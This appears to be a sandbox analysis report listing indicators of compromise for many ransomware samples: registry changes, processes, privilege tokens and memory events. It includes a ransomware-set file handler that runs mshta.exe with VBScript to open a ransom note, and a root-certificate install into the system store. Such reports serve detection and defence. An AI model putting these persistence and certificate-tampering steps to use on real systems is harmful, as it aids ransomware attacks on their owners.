Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6D5B2E2E-025E-4641-932A-3A05614DE0B5}\ea-e3-b1-bc-a8-e0	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6D5B2E2E-025E-4641-932A-3A05614DE0B5}\WpadNetworkName = "Network 3"	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ea-e3-b1-bc-a8-e0\WpadDecision = "0"	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6D5B2E2E-025E-4641-932A-3A05614DE0B5}	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{6D5B2E2E-025E-4641-932A-3A05614DE0B5}\WpadDecisionReason = "1"	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ea-e3-b1-bc-a8-e0	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ea-e3-b1-bc-a8-e0\WpadDecisionTime = b0eca8503e35db01	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ea-e3-b1-bc-a8-e0\WpadDecisionReason = "1"	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe

Modifies registry class 15 IoCs

Processes:

zeise.exeExplorer.EXE

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\4DE097BF\Shell\Open\Command	zeise.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\4DE097BF\Shell\Open	zeise.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\4DE097BF\DefaultIcon	zeise.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\4DE097BF	zeise.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.locked	zeise.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.locked\ = "4DE097BF"	zeise.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\4DE097BF\Shell	zeise.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\4DE097BF\Shell\Open\Command\ = "mshta.exe vbscript:Execute(\"CreateObject(\"\"WScript.Shell\"\").Run(\"\"[HOW_TO_DECRYPT_FILES].html\"\"):close\")"	zeise.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\4DE097BF\DefaultIcon\ = "%SystemRoot%\\SysWow64\\shell32.dll,47"	zeise.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

Trojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	Trojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Trojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exe

Runs net.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 19 IoCs

Processes:

pid	Process
2412	HEUR-Trojan-Ransom.Win32.Generic-44bfc4e633bd60a42304856360c3b433f336be8c277fa62f54300b2adee0e319.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
2000	HEUR-Trojan-Ransom.Win32.Generic-933adce253241d48c01191e7d6749075aff5b2e8643f5ce191f7f380979a5e08.exe
1688	HEUR-Trojan-Ransom.Win32.Generic-e2e0fc91311396226a5487adc39722495b0951844e505541a3fae1cf27d0072d.exe
628	Trojan-Ransom.Win32.AutoIt.vmt-c784f66acca1526d24bc7b70bcd1b19cbf002f0f391311a21aeb0b91b8ca6d96.exe
1800	Trojan-Ransom.Win32.Blocker.kqop-3f676db33adaf46dad27d55cc99aa0038629429ace0b56dce8ae5a9c852ea1b4.exe
1284	Trojan-Ransom.Win32.Blocker.meia-8179d0b5e1307621aa793c502a89ac3b7aba833f3b4fc815f99d0dbc85aa7c06.exe
1164	Trojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exe
1708	Trojan-Ransom.Win32.Foreign.nxqg-f41d6da3b7da9c73e404c7e8142d7c4ef60d950e6034bf76286d8bc33fde4f55.exe
1088	Trojan-Ransom.Win32.Foreign.nyfi-a8924793c280aba3fdbd366daced0d00c41dc024110f845cd2c710b30ba20c23.exe
2652	Trojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exe
1368	Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe
1056	Trojan-Ransom.Win32.Foreign.nylp-19e0727b00b01ff02b6b60c1356cf24d688a35ee1b3c2792181849da6dd23a0c.exe
1840	Trojan-Ransom.Win32.Foreign.nypw-071c5fd5859919a21ec674bb7b110821b1be772ddfe4e0d179b39e0cba9c89dd.exe
2816	Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe
2776	Trojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exe
1436	Trojan-Ransom.Win32.Shade.opn-153c5fcc5244e2188a4fc5153dfd6d3e917d0e40f2c678d2bc3f1583f15e8bda.exe
2168	Trojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exe
2948	Trojan-Ransom.Win32.Wanna.m-0a84a6106e1427505ace1155bfff4857d653567f048750043b1b44d2be50020a.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

taskmgr.exeHEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exeTrojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exe

pid	Process
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
776	HEUR-Trojan-Ransom.Win32.Generic-7cf2a9e45cecd58f88acabf6cc49ba62a18a84126f5ae0e0cf6902cdcbdf8245.exe
2168	Trojan-Ransom.Win32.Shaitan.a-52859cd1ca6da5c6ee93eeb890b3beb4d8c745cccb0841aa86798324f6533548.exe

Suspicious behavior: GetForegroundWindowSpam 5 IoCs

Processes:

7zFM.exetaskmgr.exeExplorer.EXETrojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exemsiexec.exe

pid	Process
2316	7zFM.exe
2444	taskmgr.exe
1248	Explorer.EXE
1368	Trojan-Ransom.Win32.Foreign.nykg-b4f6f8aef0ddb9734b1cb297a61ea417b4635d02a140aa92eeb404c42a44f19c.exe
1684	msiexec.exe

Suspicious behavior: MapViewOfSection 56 IoCs

Processes:

Trojan-Ransom.Win32.Blocker.meia-8179d0b5e1307621aa793c502a89ac3b7aba833f3b4fc815f99d0dbc85aa7c06.exeadsnobby.exesvchost.exechtbider.exesvchost.exeTrojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exeTrojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exeexplorer.exeExplorer.EXETrojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exeTrojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exezeise.exe

pid	Process
1284	Trojan-Ransom.Win32.Blocker.meia-8179d0b5e1307621aa793c502a89ac3b7aba833f3b4fc815f99d0dbc85aa7c06.exe
4768	adsnobby.exe
3724	svchost.exe
4076	chtbider.exe
1480	svchost.exe
7084	Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe
7084	Trojan-Ransom.Win32.Foreign.nyqe-5a29583a80b7dc2cbce4b8712024dcdff9f777d908b6f16dfb3d59fad991083e.exe
2652	Trojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exe
2652	Trojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
1248	Explorer.EXE
1248	Explorer.EXE
2776	Trojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exe
2776	Trojan-Ransom.Win32.Purgen.tc-1fc9df7944b059d2de8759ac8593de617b3b5473609f1937c507a2b845e4a432.exe
1164	Trojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exe
1164	Trojan-Ransom.Win32.Cryptor.bql-8c317a224815928cd57d87685284baf27fc84e2e37642b26b6052d882779e0a8.exe
4348	explorer.exe
1248	Explorer.EXE
1248	Explorer.EXE
1248	Explorer.EXE
4936	zeise.exe
4936	zeise.exe
4936	zeise.exe
1248	Explorer.EXE
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe
4348	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

7zFM.exetaskmgr.exeHEUR-Trojan-Ransom.Win32.Generic-933adce253241d48c01191e7d6749075aff5b2e8643f5ce191f7f380979a5e08.exeHEUR-Trojan-Ransom.Win32.Generic-44bfc4e633bd60a42304856360c3b433f336be8c277fa62f54300b2adee0e319.exeExplorer.EXEWMIC.exeWMIC.exeHEUR-Trojan-Ransom.Win32.Generic-e2e0fc91311396226a5487adc39722495b0951844e505541a3fae1cf27d0072d.exe

description	pid	Process
Token: SeRestorePrivilege	2316	7zFM.exe
Token: 35	2316	7zFM.exe
Token: SeSecurityPrivilege	2316	7zFM.exe
Token: SeDebugPrivilege	2444	taskmgr.exe
Token: SeDebugPrivilege	2000	HEUR-Trojan-Ransom.Win32.Generic-933adce253241d48c01191e7d6749075aff5b2e8643f5ce191f7f380979a5e08.exe
Token: SeDebugPrivilege	2412	HEUR-Trojan-Ransom.Win32.Generic-44bfc4e633bd60a42304856360c3b433f336be8c277fa62f54300b2adee0e319.exe
Token: SeShutdownPrivilege	1248	Explorer.EXE
Token: SeShutdownPrivilege	1248	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	3012	WMIC.exe
Token: SeSecurityPrivilege	3012	WMIC.exe
Token: SeTakeOwnershipPrivilege	3012	WMIC.exe
Token: SeLoadDriverPrivilege	3012	WMIC.exe
Token: SeSystemProfilePrivilege	3012	WMIC.exe
Token: SeSystemtimePrivilege	3012	WMIC.exe
Token: SeProfSingleProcessPrivilege	3012	WMIC.exe
Token: SeIncBasePriorityPrivilege	3012	WMIC.exe
Token: SeCreatePagefilePrivilege	3012	WMIC.exe
Token: SeBackupPrivilege	3012	WMIC.exe
Token: SeRestorePrivilege	3012	WMIC.exe
Token: SeShutdownPrivilege	3012	WMIC.exe
Token: SeDebugPrivilege	3012	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3012	WMIC.exe
Token: SeRemoteShutdownPrivilege	3012	WMIC.exe
Token: SeUndockPrivilege	3012	WMIC.exe
Token: SeManageVolumePrivilege	3012	WMIC.exe
Token: 33	3012	WMIC.exe
Token: 34	3012	WMIC.exe
Token: 35	3012	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1544	WMIC.exe
Token: SeSecurityPrivilege	1544	WMIC.exe
Token: SeTakeOwnershipPrivilege	1544	WMIC.exe
Token: SeLoadDriverPrivilege	1544	WMIC.exe
Token: SeSystemProfilePrivilege	1544	WMIC.exe
Token: SeSystemtimePrivilege	1544	WMIC.exe
Token: SeProfSingleProcessPrivilege	1544	WMIC.exe
Token: SeIncBasePriorityPrivilege	1544	WMIC.exe
Token: SeCreatePagefilePrivilege	1544	WMIC.exe
Token: SeBackupPrivilege	1544	WMIC.exe
Token: SeRestorePrivilege	1544	WMIC.exe
Token: SeShutdownPrivilege	1544	WMIC.exe
Token: SeDebugPrivilege	1544	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1544	WMIC.exe
Token: SeRemoteShutdownPrivilege	1544	WMIC.exe
Token: SeUndockPrivilege	1544	WMIC.exe
Token: SeManageVolumePrivilege	1544	WMIC.exe
Token: 33	1544	WMIC.exe
Token: 34	1544	WMIC.exe
Token: 35	1544	WMIC.exe
Token: SeDebugPrivilege	1688	HEUR-Trojan-Ransom.Win32.Generic-e2e0fc91311396226a5487adc39722495b0951844e505541a3fae1cf27d0072d.exe
Token: SeIncreaseQuotaPrivilege	3012	WMIC.exe
Token: SeSecurityPrivilege	3012	WMIC.exe
Token: SeTakeOwnershipPrivilege	3012	WMIC.exe
Token: SeLoadDriverPrivilege	3012	WMIC.exe
Token: SeSystemProfilePrivilege	3012	WMIC.exe
Token: SeSystemtimePrivilege	3012	WMIC.exe
Token: SeProfSingleProcessPrivilege	3012	WMIC.exe
Token: SeIncBasePriorityPrivilege	3012	WMIC.exe
Token: SeCreatePagefilePrivilege	3012	WMIC.exe
Token: SeBackupPrivilege	3012	WMIC.exe
Token: SeRestorePrivilege	3012	WMIC.exe
Token: SeShutdownPrivilege	3012	WMIC.exe
Token: SeDebugPrivilege	3012	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3012	WMIC.exe
Token: SeRemoteShutdownPrivilege	3012	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

7zFM.exetaskmgr.exeTrojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exeExplorer.EXE

pid	Process
2316	7zFM.exe
2316	7zFM.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2652	Trojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exe
2652	Trojan-Ransom.Win32.Foreign.nyif-0b1d0bf898aa8a938652c53361b9d87b63d7b7627def44cb8958686fe45def42.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
1248	Explorer.EXE
1248	Explorer.EXE
2444	taskmgr.exe
